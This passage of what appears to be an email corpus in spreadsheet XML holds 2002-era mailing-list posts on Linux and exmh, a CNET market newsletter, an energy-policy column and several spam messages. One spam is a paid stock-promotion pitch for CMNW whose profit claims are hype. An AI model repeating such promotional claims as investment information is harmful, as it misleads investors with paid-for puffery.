 Peer-to-Peer Networks' at 9AM., Thursday, September 26, (2141 Rayburn House 
 Office Building). The Berman-Coble bill will be discussed. The hearings are 
 open to the press."
 [1] http://radio.weblogs.com/0107946/2002/09/25.html#a187
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :
 &gt; The new spec didn't even want to build the package
 &gt; something with config.mak
 Now that is weird! :-/
 &gt; Also this new spec looks like the old one, it got libdv and libdv-devel
 &gt; in the BuildRequires so I just used the normal spec and removed it
 &gt; manully.
 Indeed, my boo-boo :-( Fixed now.
 BTW, about the "mplayer -vo sdl" black screen problem you reported, I was
 unable to reproduce it on my hom 8.0 computer, it worked as expected.
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 Load : 0.10 0.15 0.16, AC on-line, battery charging: 100% (1:47)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] linux pthreads problem
</t>
  </si>
  <si>
    <t xml:space="preserve">Padraig Brady wrote:
 &gt; Vincent Cunniffe wrote:
 &gt; 
 &gt;&gt;
 &gt;&gt; Possibly. However, the amount of memory in use is stupid :
 &gt;&gt;
 &gt;&gt; I start 50 threads, and the memory usage goes up to 411436 VSZ/840 RSS.
 &gt;&gt;
 &gt;&gt; Then I stop those threads, and the usage stays there. I start another 50
 &gt;&gt; threads, and the usage goes up to 821036 VSZ/1040 RSS. So, it's neither
 &gt;&gt; freeing the resources correctly nor reusing them :-/
 &gt;&gt;
 &gt;&gt; I've found several other people seeing the same VSZ issue with pthreads,
 &gt;&gt; spread over a long time, but no solution as yet.
 &gt; 
 &gt; 
 &gt; Err, Is your code fixed now?
 &gt; You need a seperate pthread_t per thread.
 I've tested it with and without separate pthread_t's, and the problem is
 identical, unfortunately.
 Regards,
 Vin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A couple of nits...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I have a couple of small issues, and I'm not sure if their exmh issues
 or my setup issues.
 First, when I try and run exmh with wish from tk8.4.0 it seems to take
 forever to start, but with wish from tk8.a.4 it starts in a snap.
 Using the latest CVS, when I open exmh and the folder I'm in has unseen
 messages and I hit next, exmh changes to the next folder with unseen messages
 rather than to the first unseen in the current folder.
 Finally, when I reach the end of the messages in a folder and go on to
 the next unseen, exmh always goes back to inbox (which has no unseen
 messages) rather than the next folder with unseen messages.  (When I 
 goto next from inbox it does go where I would think it should go).
 Just wanted to let you know what I'm seeing and find out if I'm expecting
 some different than I should be.
 Thanks for all the effort
 Jim
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NEWS.COM INVESTOR: Tech stocks drop again on Qwest criminal probe news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</si>
  <si>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href="http://clickthru.online.com/Click?q=e2-J1OpQhyzid1CKDqENBEZdihv9KnR"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href="http://clickthru.online.com/Click?q=f7-N0QnQLgzok63jWHlrZIGiR6ImOeR" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2CDzTRoQNv0T0QkY6b7PR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdArfPRVUWuo4I9yc99NcnR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzFSlDTPRUQ93KjZ6eJcneR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpI6SWLkdPAu7hgvo2AKesR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav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href="http://clickthru.online.com/Click?q=61-x9oAIoLj9fatbFb4JYndFK-AWlFR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBP3_dd7Ti1okYP2r70U69R" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0y_jEu6YSEYIEElDh4B1rR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQBqXHDVsDPUByjw2PB1s7iR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7U7vHrLZfZ1PHq15ZNEEZPR"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10,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href="http://clickthru.online.com/Click?q=cb-CjRIQJsrcz1TnqNyXYHRf_uaHkrR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8813.50 &amp;nbsp;&lt;font color=#cc0000&gt;-282.59&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDH017GGwkkPhB7mxUT9AiR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1346.01 &amp;nbsp;&lt;font color=#cc0000&gt;-35.11&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=f5-lTbRQgwx12fsoux6DmLwgkaZmRPR" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;920.47 &amp;nbsp;&lt;font color=#cc0000&gt;-32.36&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrscnuQ3lMBwhq6GOxuYznR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;965.29 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#cc0000&gt;-26.23&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- VISION PROMO --&gt;
 &lt;tr&gt;&lt;td colspan=4 bgcolor="#cccccc"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;CNET News.com Vision Series&lt;/b&gt;&lt;br&gt;Read News.com's exclusive interviews of 10 top CIOs.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58w5y5Y5-f1xmYgHobjqmeR" &gt;Vision Series home&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- /VISION PROMO --&gt;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 stocks drop again on Qwest criminal probe news&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Word telecom Qwest Communications International is being investigated by the U.S. Attorney's office in Denver helped send technology shares lower Wednesday.
 &lt;p&gt;
 Despite a Merrill Lynch upgrade of Cisco Systems and the fact that J.P. Morgan began coverage on AOL Time Warner with a "buy" rating, CNET's Tech index fell 26.23 points, or 2.66 percent, to 965.29. The tech-heavy Nasdaq composite index lost 35.11 points, or 2.54 percent, to 1,346.01--a multi-year low.
 &lt;p&gt;
 Broader markets also shed value, dragged down in part by a troubled pharmaceutical sector. The Dow Jones industrial average dropped 282.5 points, or 3.11 percent, to 8,813.5, and the S&amp;P 500 slid 32.36 points, or 3.52 percent, to 920.47--also a multi-year low.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href="http://clickthru.online.com/Click?q=34-pJpSIcd819B4rhq3_tvVyn4IcgyR" &gt;AT&amp;T, Comcast Shareholders OK Broadband Deal &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Shareholders of AT&amp;T Corp. and Comcast Corp. on Wednesday approved the planned $27 billion merger of AT&amp;T Broadband with Comcast, which will create the nation's largest cable TV operator with more than 22 million customers.
 Telephone giant AT&amp;T in December agreed to sell its cable television unit to Comcast as part of a restructuring that dismantled its vision of becoming a one-stop shop for telephone, data and video services.&lt;br&gt;&lt;B&gt;AT&amp;T CORP 9.78 -2.30% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSenC10zjVX4RVXFO5JSFR" &gt;$215 million later, start-up Pluris shuts down &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Networking start-up Pluris will release a statement Wednesday announcing it has closed its doors because of a lack of funding and ongoing woes in the market it serves, according to a spokeswoman familiar with the company's plans.
 Pluris, a once promising company, burned through $215 million over the past few years as it attempted to build a high-end router that was intended to outclass similar products from competitors such as Juniper Networks and Cisco Systems.&lt;br&gt;&lt;B&gt;CISCO SYSTEMS 13.51 2.82% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2Fzc7al6fez6pa6cIJuR" &gt;WorldCom contracts under U.S. scrutiny &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 The accounting scandal at WorldCom has prompted U.S. government agencies to scrutinize the telecommunications company's billions of dollars in federal contracts.
 The Federal Aviation Administration, for one, has been forced to take stock of the situation quickly. WorldCom is a finalist for a 20-year, $3.5 billion contract with the FAA. The contract is expected to be awarded as soon as this week. The company is the incumbent on the contract, which supplies phone and data infrastructure to the nation's air traffic control systems.&lt;br&gt;&lt;B&gt;WORLDCOM INC-WORLDCOM TRCK STK 0.20 -3.81%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href="http://clickthru.online.com/Click?q=74-VAV8IZZSN6A6Wn0RYG8Y0gSPZxsR"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href="http://clickthru.online.com/Click?q=89-h28bQ-J1QVDWD5ykUMBXB6W5WWlR" &gt;Banc of America Securities lowers estimates and price target on IBM in notes 7/10/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analyst Joel Wagonfeld argues the computer giant is not immune to the persistent, widespread weakness in IT spending. But a roughly 6 percent dip in revenues during the second quarter will be offset by the elimination of losses from the discontinued hard disk drive business, Wagonfeld predicts. In IBM's second-quarter results, he expects continued weakness in hardware but relative strength in software and outsourcing. The company's decision to exit or restructure unprofitable, commodity businesses is sound, Wagonfeld says. He reiterates a "buy" rating on IBM.&lt;br&gt;&lt;B&gt;INTL BUSINESS MACHINES 68.76 -1.31% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQJGPlW7jHSCN0U7nQUD4R"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href="http://clickthru.online.com/Click?q=b3-QHzxQYKTqeTEqynAE64qDAwrPGrR" &gt;Pressplay CEO Schuon to leave company&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Andy Schuon is leaving as president and chief executive officer of Pressplay, a joint online venture between Sony Music and Universal Music, sources close to the matter said on Wednesday.
 Sony Music is a unit of Sony Corp, and Universal Music is a unit of Vivendi Universal.&lt;br&gt;&lt;B&gt;SONY CORP ADR 50.47 -4.32% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzdDm4iygMKE-nFr99H2iR"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href="http://clickthru.online.com/Click?q=de-7tpkQMWaO-_Q5E_tTbDS-BJjho4R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwj9BmISgCs3CyJqsjeorR"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href="http://clickthru.online.com/Click?q=08-IFoQIRjFUlrv0mOg3F-erCpGY9iR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQF7vBeQKORl28NRQSnqQPR"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href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6j3Y499BDFWVhZSgRXBnR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZH1jj2TNNOiJGu_NEsnEuR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnPblY751U53xlZk0f-IosR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcfHlVz9LqwuBXvl3NU2FR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJonnAOpszSjaeTldfVpf4R" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo2p6pzmP0dAVJ9PZAKTrR"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href="http://clickthru.online.com/Click?q=b1-YjxJQ-0dzAP7PJVr9i_f_B0NLnlR"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href="http://clickthru.online.com/Click?q=c6-URF9QMLKguZvu7xWdT_pfmeDx04R" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEK6mDfsBmvpmtTwxp6DtrR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=f0-nvVDrQg8JnbPCuclfqaFOt4zzz0_jN9RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8WRMaz-NZfnODtxI8fiiPR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6wztbpId5q0_HZB17WnR"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href="http://clickthru.online.com/Click?q=2f-hYaFIqnzAaBl8Q5P26D_8gaZjMeR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtYMOhuggEMLKlXBDgnVsR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IMGrqJbf24YOLpk6Td6dR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLAbBAQPc03RXvLF34ULXuR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60Tyg7J3vUZsihsBSWgp7yR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTjOeC53W2H3f2jvrqULlR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e426&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=ae-jOB6-tBFPYl11aobN1Uo198IkRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: California needs intelligent energy deregulation
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Date: Wed, 25 Sep 2002 13:57:15 -0400
 To: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;
 From: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 Subject: California needs intelligent energy deregulation
 Sender: &lt;dbs@philodox.com&gt;
 http://www.siliconvalley.com/mld/siliconvalley/4144696.htm?template=contentModules/printstory.jsp
 Posted on Tue, Sep. 24, 2002
 Dan Gillmor: State needs intelligent energy deregulation
 By Dan Gillmor
 Mercury News Technology Columnist
 The facts were trade and government secrets at the time. But the energy
 industry failed the smell test in 2000 and 2001 as it tried to justify
 soaring wholesale electricity and natural-gas prices in California.
 Now, as investigators and regulators unravel the reasons for a financial
 and fiscal mess we'll be cleaning up for decades, we're learning what
 everyone suspected. Market games helped engineer the price spikes.
 The latest manipulation was highlighted in Monday's finding by a federal
 administrative law judge, who said a dominant natural-gas company squeezed
 supplies in order to squeeze customers. His ruling came a few days after
 California's Public Utilities Commission reported that electricity
 generators mysteriously failed to use available capacity during the crunch,
 also driving up prices.
 And don't forget the sleazy games by energy traders who gleefully worked
 the system, in schemes best summed up by an Enron insider's boast in a
 memorandum made public in May, that ``Enron gets paid for moving energy to
 relieve congestion without actually moving any energy or relieving any
 congestion.''
 How much of this was illegal, as opposed to simply amoral, remains to be
 seen. Unfortunately, California's response -- confusion, lawsuits and
 policy tweaks -- hasn't been sufficient.
 More unfortunately, even if the state suddenly did all the right things --
 including a hard-nosed program designed to free ourselves from the gougers'
 grips -- we would need a willing federal partner. But it's foolish to think
 that the Bush administration would do much to help one of its least
 favorite states, or do anything that conflicts with its love of
 traditional, non-renewable energy sources.
 If the lawsuits against various energy companies and traders bear any
 fruit, the best we can expect is to pay off some of the massive debts the
 state amassed to prevent a total collapse in early 2001. That's a
 reasonable approach, but don't expect miracles.
 State policies are moving the wrong way on utility regulation, meanwhile.
 Instead of relentlessly pursuing smart deregulation -- still a good idea if
 it gives customers genuine choices -- state laws and regulations ``put the
 utilities back in the business of buying energy for captive customers,''
 notes V. John White, executive director of the Sacramento-based Center for
 Energy Efficiency and Renewable Technologies (www.ceert.org).
 It's tempting to call for an outright state takeover of the utilities --
 tempting but a bad idea. When there's genuine competition, as we could
 achieve in electricity generation, the private sector tends to do a better
 job. Instead of abandoning deregulation, California should find a way to
 inject real competition into the market.
 We do need to recognize that the current system of delivering electricity
 defies privatization, at least under current conditions. Smart regulation
 is essential.
 But the best response to gouging is to use less of what the gougers
 control. There are two ways: conservation and replacement. We need more of
 both.
 The best recent step is a new state law that slowly but surely ratchets up
 the use of electricity from renewables. By 2017, California's utilities
 will have to get 20 percent of their power from solar and other renewable
 sources. Several power companies are expected to do this even sooner.
 But this law has an element of old-line thinking, the captive-customer
 model we need to be getting away from, not sustaining. Lip service to newer
 ideas isn't enough.
 The state should be removing barriers to micro-generation systems, small
 generators that can run on a variety of fuels and provide decentralized,
 harder-to-disrupt electricity to homes and businesses. This technology is
 coming along fast. State policies are not keeping pace.
 Investing to save energy is increasingly the smartest move of all.
 California should be doing more to encourage this, whether through tax
 incentives or outright grants in low-income households. California hasn't
 done badly on conservation in a general sense, and energy customers did
 react to last year's soaring rates and blackouts by cutting back, but it's
 lunacy to wait for the next crisis when we can do something to avoid it
 altogether.
 Maybe this is all pointless. The Bush administration's energy policies, so
 grossly tilted toward the unholy trinity of oil, coal and nuclear, are
 making us all more vulnerable. Never mind what might happen if the coming
 war in Iraq goes badly.
 It's pointless to hope for a sane federal policy -- a crash program to
 drastically speed the inevitable transition to a hydrogen-based energy
 system. But the largest state, one of the world's major economies in its
 own right, does have some clout. We can hit the rip-off artists where it
 hurts, and protect ourselves from even more serious disruptions. Maybe next
 year.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</si>
  <si>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The Stock has "wow" factor
</t>
  </si>
  <si>
    <t xml:space="preserve">
 China's rapid economic growth, as ranked by the World Bank, is TEN TIMES 
 FASTER than the world economy. 
 The only thing US investors should be asking themselves is, "How can I 
 participate in this explosion?" We have the answer. Texas-based 
 CommunicateNow.com, Inc. (OTC BB trading symbol: CMNW) may unlock 
 China's amazing potential.
 INVESTOR'S TIMING OPPORTUNITY
 Texas-based CommunicationsNow.com Inc. (OTCBB trading symbol: CMNW) 
 announces today that a top representative from CMNW will be traveling to 
 China in an attempt to negotiate with one of China's top manufacturers of
 high pressure laminate products for CMNW to act as a worldwide distributor
 of its products. You know what the Chinese did to the global steel market:
 they captured it! China is now set to conquer another major commodity, and
 you can profit right along with them. This is just one example of how CMNW 
 may make company history.
 Opening China's Door
 Using hard-won experience gained in the survivor-takes-all US Internet market, 
 CMNW developed technology that makes it possible for China's millions of 
 entrepreneurs, small and medium sized companies, and major corporations to 
 do business worldwide via the Internet. Chinese makers of porcelain, for 
 example, can deal direct with US consumers and retailers. Say "goodbye" to 
 the layers of middlemen.
 CMNW strives to become a World Wide Wholesaler 
 CMNW is attempting to become an International wholesaler to the world. This
 is an enormous goal. Many believe that trade with China built the world's greatest
 fortunes, from the golden age of Venice to the British Empire. Now this potential
 is being transferred to the Internet, and CMNW will attempt to capture it.
 CMNW puts all this into your portfolio: stability of a US-based company... 
 sky-rocketing China market...convenience of a US-listed stock...dynamics of 
 a growth company. 
 *** For the latest quarterly report on CMNW, go to www.freeedgar.com *** 
 Obviously, you cannot go back in time to the year 1901 and invest in baby US 
 companies like Coca-Cola and Johnson &amp; Johnson as they were getting started. 
 But you can grab the modern day equivalent. That's right. The growth 
 potential in China at this very minute is like the United States at the start 
 of the 20th century -- perhaps even greater. 
 There's much more to the CMNW story. Including a major expansion into Mexico. 
 To SUBSCRIBE to the future communications, please click on this link and hit send:
 mailto:abc111@uole.com.ve?subject=INFO-CMNW
 ================================================================= 
 Please double click on the below link to be excluded from further communication. 
 mailto:def222@uole.com.ve?subject=delete-CMNW 
 =================================================================
 DISCLAIMER: Network Media Services provides an e-mail delivery service on behalf of securities 
 issuers and publishers that circulate information about a company or the companys securities. 
 Network Media Services has received twenty thousand shares of the common stock of 
 CommunicateNow.com, Inc.as payment to circulate this report via electronic mail to e-mail
 addresses contained in Network Media Services database. To read entire disclaimer please
 click here: http://members.tripod.de/mani20/index1.html/
</t>
  </si>
  <si>
    <t xml:space="preserve">
  Ar an 20 l de m 7, scrobh kevin lyda :
  &gt; On Sat, Jul 20, 2002 at 08:24:47PM +0100, Aidan Kehoe wrote:
  &gt; &gt;  Ar an 20 l de m 7, scrobh kevin lyda :
  &gt; &gt;  &gt; actaully i think soft links were invented because you can't hard link
  &gt; &gt;  &gt; directories. 
  &gt; &gt; But you could hard link directories, back when soft links were
  &gt; &gt; being invented, AFAIK. 
  &gt; 
  &gt; that was before my time.  all unix systems i've used didn't allow hard
  &gt; links to directories, or if they did they were restricted to root.
  &gt; the reason why is because you could cause infinite loops in the kernel -
  &gt; usually a bad place for infinite loops.
 Yeah, thanks. I have been subscribed for more than a week, despite any
 navet I may be showing to you :-) . 
  &gt; &gt;  &gt; apparently some systems limited soft links to the same device but
  &gt; &gt;  &gt; gave up after a while.  
  &gt; &gt; Why?
  &gt; 
  &gt; to make them consistent with hard links.
 So, they're the same as hard links, with the disadvantage that they
 break on deletion or moving, and they may take up slightly more disk
 space. Hmm.
  &gt; &gt; A better way of doing it would be a) have global unique filesystem
  &gt; &gt; identifiers for every FS created (such that the chance of two of them
  &gt; &gt; clashing is miniscule; 64 bits creatively used would do it, I'd say),
  &gt; &gt; and b) implement the target info for the soft link as a {FSID, inode}
  &gt; &gt; pair; the OS can work out if the thing linked to is now on a different
  &gt; &gt; mount point, or has been moved. (HFS fans, is that what's done? Or are
  &gt; &gt; aliases implemented differently?)
  &gt; 
  &gt; let's call these super-soft-links.  ln -ss
  &gt; 
  &gt;     % ln -ss foo bar
  &gt;     % ls -i foo
  &gt;     111 foo
  &gt;     % mv floyd foo
  &gt;     % ls -i foo
  &gt;     222 foo
  &gt; 
  &gt; and now bar no longer points to foo.
 True. But "cat floyd &gt; foo; rm floyd" preserves it. Much of a muchness
 ...
  &gt; the fs would need to maintain a table of links going the other direction.
  &gt; so when the move command unlinks foo in the first example, it could
  &gt; check the table and mark that bar is now disconnected.  the same would
  &gt; be true for the second example - and even more important since bar points
  &gt; to floyd if no table is consulted.
  &gt; 
  &gt; and this all fails to handle nfs mounted file systems or filesystems
  &gt; that have dynamic inodes (the fat fs's and reiser lacks inodes i think).
 Hokay. 
 -- 
 I'm not a pheasant plucker / I'm a pheasant plucker's son.
 I'm just a'plucking pheasants / 'Til the pheasant plucker comes.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: QOTD: Give me a frigging break.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Nev Dull &lt;nev@sleepycat.com&gt;
 Forwarded-by: newsletter@tvspy.com
 "Give me a frigging break. I've been a frigging diva for 40 frigging
 years."
 	-- CHER to fans in Las Vegas who booed last weekend when she
 	told them the performance was part of her last tour.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Copy any DVD Movie.f4y3
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
  (kazadown@libero.it) on Monday, July 22, 2002 at 04:49:18
 ---------------------------------------------------------------------------
 : Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: http://008@www.dvdcopyxp.com/cgi-bin/enter.cgi?marketing_id=dcx007 Click to remove http://009@www.spambites.com/cgi-bin/enter.cgi?spambytes_id=100115 
 ---------------------------------------------------------------------------
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 cwg-dated-1030817858.a49b7e@DeepEddy.Com said:
 &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; Date:  Mon, 26 Aug 2002 20:00:36 +0200 &gt;
 &gt; 
 &gt; lately I've got the feeling that exmh is getting slower and slower. I 
 &gt; just decided to check that vs. reality, and yes, speed has left the 
 &gt; scene somewhere between the release of 2.5 and now.
 &gt; 
 &gt; I checked on a number of small messages in a big folder (~10000 
 &gt; msgs). The delay of the Next button has increased considerably:
 &gt; 
 &gt; 2.5-release: 350-450 msec
 &gt; latest cvs: 1000-12000 msec
 &gt; 
 &gt; Frankly I think this is getting close to non-acceptable since the 
 &gt; user settings hasn't changed.
 &gt; 
 &gt; Anybody have any ideas where performance disappeared?
 &gt; Most likely in the added overhead of managing more sequences.
 &gt; I'm sure it can be tuned a bunch, but as I'm leaving for a vacation on
 &gt; Friday,  and have plenty of "real work" to do, I won't be able to do
 &gt; much until I get  back.
 &gt; I *will* look at all this when I get back, but if you want to check
 &gt; into  what's slow and fix things while I'm gone, my feelings won't be
 &gt; hurt.
 &gt; Chris 
